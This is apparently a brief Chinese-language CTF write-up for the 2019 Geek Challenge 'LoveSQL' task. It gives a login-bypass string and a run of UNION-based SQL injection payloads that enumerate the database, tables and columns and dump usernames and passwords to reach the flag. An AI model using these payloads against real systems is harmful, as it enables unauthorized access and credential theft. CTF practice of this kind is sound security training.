原理
常规注入
解题过程
进入登录界面,还是使用万能登录试一试
payload:1' or 1=1#
没想到成功了,说明字符型注入使用的'爆出的密码应该是MD5加密,爆破很麻烦,试试常规注入
payload:1' order by 4#
payload:1' order by 3#
找出列项
payload:1' union select 1,database(),3#
找出数据库名 geek
payload:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek';#
找出表名为:geekuser l0ve1ysq1
payload:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1';#
找出字段名:id,username,password
payload:1' union select 1,group_concat(id,username,password),3 from geek.l0ve1ysq1;#
爆出flag
标签:极客,group,union,geek,LoveSQL,2019,l0ve1ysq1,payload,select
From: https://www.cnblogs.com/BEONTHE/p/17741999.html